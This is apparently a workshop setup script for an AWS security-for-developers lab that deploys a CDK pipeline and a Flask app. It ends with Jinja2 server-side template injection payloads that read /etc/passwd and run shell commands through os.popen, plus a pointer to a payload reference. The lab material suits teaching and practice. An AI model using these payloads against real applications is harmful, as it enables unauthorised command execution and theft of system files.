deploy-aws-workshop.sh

#!/bin/bash
cd ~/environment
wget https://workshops.devax.academy/security-for-developers/module2/files/pipeline.zip
unzip pipeline.zip -d pipeline
cd ~/environment/pipeline/
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
cp config.yaml.sample config.yaml
cdk bootstrap
cdk deploy --require-approval never

cd ~/environment
git clone codecommit://flask-app
cd ~/environment/flask-app
wget https://workshops.devax.academy/security-for-developers/module2/files/flask-app.zip
unzip flask-app.zip
rm flask-app.zip
git config user.name "<Your Name>"
git config user.email "<You Email Address>"
git add .
git commit -a -m"Initial Commit"
git push
sed -i -e "0,/False/{s/False/True/}" config.yaml
cd ~/environment/pipeline
cdk deploy --require-approval never


###########

{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}

Similar to ID, try running `ls`, `cat models.py`

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#exploit-the-ssti-by-calling-ospopenread